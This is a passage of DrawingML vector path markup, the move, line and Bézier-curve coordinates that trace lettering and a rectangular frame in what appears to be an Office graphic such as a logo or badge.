                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30191" y="337496"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234898" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250808" y="324762"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="258050" y="324762"/>
                    <a:pt x="261773" y="328113"/>
                    <a:pt x="261773" y="333766"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262118" y="337531"/>
                    <a:pt x="259809" y="341030"/>
                    <a:pt x="256218" y="342188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258254" y="342479"/>
                    <a:pt x="261163" y="343966"/>
                    <a:pt x="261163" y="349211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260879" y="352240"/>
                    <a:pt x="261507" y="355284"/>
                    <a:pt x="262966" y="357953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="256741" y="357953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="256018" y="356429"/>
                    <a:pt x="255716" y="354738"/>
                    <a:pt x="255869" y="353057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255869" y="347025"/>
                    <a:pt x="254589" y="344315"/>
                    <a:pt x="249266" y="344315"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="240715" y="344315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240715" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234898" y="358011"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205637" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229517" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229517" y="329803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211454" y="329803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211454" y="338516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228179" y="338516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228179" y="343237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211454" y="343237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211454" y="352970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229837" y="352970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229837" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205637" y="358011"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171869" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="178006" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193131" y="349269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193218" y="349269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193218" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198744" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198744" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192636" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177512" y="333562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177395" y="333562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177395" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171869" y="358011"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="138304" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144441" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159595" y="349269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159682" y="349269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159682" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165208" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165208" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159071" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143976" y="333562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143830" y="333562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143830" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138304" y="358011"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="125622" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="131439" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131439" y="357982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125622" y="357982"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="78532" y="324762"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="84407" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90399" y="350172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90515" y="350172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97205" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103139" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109654" y="350172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109741" y="350172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115907" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121812" y="324762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112650" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106774" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100114" y="332601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100026" y="332601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93250" y="358011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87258" y="358011"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3345" y="300139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3345" y="384440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338153" y="384440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338153" y="300139"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="157355" y="235158"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157500" y="235158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162678" y="252992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152119" y="252992"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="81703" y="235158"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81848" y="235158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87026" y="252992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76467" y="252992"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="217533" y="233963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="223350" y="233963"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232949" y="233963"/>
                    <a:pt x="234985" y="240461"/>
                    <a:pt x="234985" y="248737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234985" y="257042"/>
                    <a:pt x="232949" y="263540"/>
                    <a:pt x="223350" y="263540"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217533" y="263540"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="183241" y="233963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="193014" y="233963"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196097" y="233963"/>
                    <a:pt x="199006" y="234983"/>
                    <a:pt x="199006" y="240287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199006" y="244628"/>
                    <a:pt x="197028" y="246901"/>
                    <a:pt x="193189" y="246901"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="183241" y="246901"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211426" y="228018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="211426" y="269542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225910" y="269542"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236585" y="269542"/>
                    <a:pt x="241180" y="260247"/>
                    <a:pt x="241180" y="248824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241180" y="237401"/>
                    <a:pt x="236585" y="228106"/>
                    <a:pt x="225910" y="228106"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="177424" y="228018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177424" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183241" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183241" y="252408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192287" y="252408"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="197871" y="252408"/>
                    <a:pt x="199180" y="255759"/>
                    <a:pt x="199180" y="263365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199017" y="265437"/>
                    <a:pt x="199325" y="267519"/>
                    <a:pt x="200082" y="269455"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206510" y="269455"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="205034" y="266004"/>
                    <a:pt x="204473" y="262230"/>
                    <a:pt x="204881" y="258499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204881" y="251971"/>
                    <a:pt x="201827" y="250106"/>
                    <a:pt x="199733" y="249757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200925" y="249290"/>
                    <a:pt x="205550" y="247280"/>
                    <a:pt x="205550" y="239325"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="205288" y="239237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="205288" y="232214"/>
                    <a:pt x="201391" y="228018"/>
                    <a:pt x="193945" y="228018"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="154155" y="228018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140979" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147204" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150461" y="258499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164277" y="258499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167535" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173934" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160612" y="228018"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97060" y="228018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106164" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112417" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119601" y="237780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126524" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132690" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142230" y="228018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135860" y="228018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129432" y="259723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122655" y="228018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116460" y="228018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109479" y="259723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103226" y="228018"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="78532" y="228018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65327" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71580" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74809" y="258499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88625" y="258499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91882" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98368" y="269455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84989" y="228018"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="257264" y="227001"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="250711" y="227113"/>
                    <a:pt x="245489" y="232526"/>
                    <a:pt x="245601" y="239091"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245311" y="243973"/>
                    <a:pt x="248520" y="248375"/>
                    <a:pt x="253251" y="249582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257992" y="251155"/>
                    <a:pt x="261133" y="251913"/>
                    <a:pt x="263576" y="253020"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265556" y="253899"/>
                    <a:pt x="266734" y="255965"/>
                    <a:pt x="266485" y="258120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266485" y="261267"/>
                    <a:pt x="264507" y="264385"/>
                    <a:pt x="259155" y="264385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258648" y="264434"/>
                    <a:pt x="258136" y="264434"/>
                    <a:pt x="257628" y="264385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253231" y="263962"/>
                    <a:pt x="250008" y="260048"/>
                    <a:pt x="250430" y="255643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="244380" y="255643"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="244641" y="265929"/>
                    <a:pt x="251011" y="270446"/>
                    <a:pt x="258923" y="270446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265816" y="270446"/>
                    <a:pt x="272680" y="266745"/>
                    <a:pt x="272680" y="257450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272879" y="252867"/>
                    <a:pt x="270194" y="248650"/>
                    <a:pt x="265962" y="246901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264158" y="246260"/>
                    <a:pt x="256509" y="243870"/>
                    <a:pt x="255956" y="243696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253484" y="243207"/>
                    <a:pt x="251703" y="241033"/>
                    <a:pt x="251709" y="238509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251709" y="234313"/>
                    <a:pt x="255142" y="233118"/>
                    <a:pt x="258050" y="233118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258424" y="233078"/>
                    <a:pt x="258801" y="233070"/>
                    <a:pt x="259176" y="233093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262912" y="233323"/>
                    <a:pt x="265755" y="236543"/>
                    <a:pt x="265525" y="240286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="271575" y="240286"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="271604" y="239786"/>
                    <a:pt x="271603" y="239284"/>
                    <a:pt x="271572" y="238784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271143" y="231861"/>
                    <a:pt x="265193" y="226598"/>
                    <a:pt x="258283" y="227028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257944" y="227004"/>
                    <a:pt x="257604" y="226995"/>
                    <a:pt x="257264" y="227001"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="287165" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287165" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310085" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310085" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292633" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292633" y="201967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308369" y="201967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308369" y="196606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292633" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292633" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309619" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309619" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223961" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="223961" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229197" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229197" y="190982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243362" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249179" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249237" y="181103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244031" y="181103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244031" y="208611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229779" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="196592" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="196592" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219482" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219482" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202031" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202031" y="201793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217766" y="201793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217766" y="196431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202031" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202031" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219017" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219017" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171607" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171607" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192811" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192811" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177046" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177046" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146448" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146448" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167738" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167738" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151887" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151887" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="118903" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="118903" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141823" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141823" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124371" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124371" y="201880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140107" y="201880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140107" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124371" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124371" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141357" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141357" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="56369" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66665" y="199170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55612" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61866" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69806" y="204182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77543" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84175" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="199083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83448" y="181103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77339" y="181103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69951" y="194275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62884" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="31558" y="181103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31558" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54303" y="218548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54303" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37026" y="212720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37026" y="201880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52733" y="201880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52733" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37026" y="196518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37026" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54012" y="186756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54012" y="181103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100666" y="180200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="91301" y="180200"/>
                    <a:pt x="85716" y="188971"/>
                    <a:pt x="85716" y="199782"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85716" y="210593"/>
                    <a:pt x="91301" y="219335"/>
                    <a:pt x="100666" y="219335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108112" y="219335"/>
                    <a:pt x="113493" y="213157"/>
                    <a:pt x="113929" y="204211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="108607" y="204211"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108170" y="209660"/>
                    <a:pt x="105495" y="214002"/>
                    <a:pt x="100666" y="214002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93976" y="214002"/>
                    <a:pt x="91184" y="206950"/>
                    <a:pt x="91184" y="199782"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91184" y="192614"/>
                    <a:pt x="93976" y="185533"/>
                    <a:pt x="100666" y="185533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105204" y="185533"/>
                    <a:pt x="107501" y="188680"/>
                    <a:pt x="108432" y="192963"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="113900" y="192963"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113900" y="192952"/>
                    <a:pt x="113900" y="192941"/>
                    <a:pt x="113900" y="192929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113754" y="185753"/>
                    <a:pt x="107829" y="180054"/>
                    <a:pt x="100666" y="180200"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="268841" y="180113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259504" y="180113"/>
                    <a:pt x="253920" y="188884"/>
                    <a:pt x="253920" y="199694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253920" y="210505"/>
                    <a:pt x="259504" y="219247"/>
                    <a:pt x="268841" y="219247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276316" y="219247"/>
                    <a:pt x="281697" y="213070"/>
                    <a:pt x="282133" y="204124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="276869" y="204124"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="276432" y="209573"/>
                    <a:pt x="273757" y="213915"/>
                    <a:pt x="268899" y="213915"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="268899" y="214002"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="262238" y="214002"/>
                    <a:pt x="259446" y="206950"/>
                    <a:pt x="259446" y="199782"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259446" y="192614"/>
                    <a:pt x="262238" y="185533"/>
                    <a:pt x="268899" y="185533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273466" y="185533"/>
                    <a:pt x="275764" y="188680"/>
                    <a:pt x="276694" y="192963"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="282133" y="192963"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="282133" y="192884"/>
                    <a:pt x="282131" y="192804"/>
                    <a:pt x="282129" y="192725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281936" y="185566"/>
                    <a:pt x="275987" y="179919"/>
                    <a:pt x="268841" y="180113"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="195167" y="116150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="195283" y="129235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206917" y="129235"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207433" y="129310"/>
                    <a:pt x="207956" y="129320"/>
                    <a:pt x="208474" y="129261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211794" y="128887"/>
                    <a:pt x="214184" y="125888"/>
                    <a:pt x="213811" y="122561"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213811" y="117200"/>
                    <a:pt x="210495" y="116150"/>
                    <a:pt x="206801" y="116150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="188070" y="110410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207383" y="110410"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="216225" y="110410"/>
                    <a:pt x="220762" y="114635"/>
                    <a:pt x="220762" y="121746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221231" y="126395"/>
                    <a:pt x="218469" y="130763"/>
                    <a:pt x="214073" y="132323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216516" y="132527"/>
                    <a:pt x="220093" y="134421"/>
                    <a:pt x="220093" y="141065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220093" y="145932"/>
                    <a:pt x="220762" y="150390"/>
                    <a:pt x="222275" y="152109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214683" y="152109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="213811" y="150174"/>
                    <a:pt x="213451" y="148047"/>
                    <a:pt x="213636" y="145932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213636" y="138239"/>
                    <a:pt x="212095" y="134829"/>
                    <a:pt x="205579" y="134829"/>
                  </a:cubicBezTo>
                  <a:lnTo>
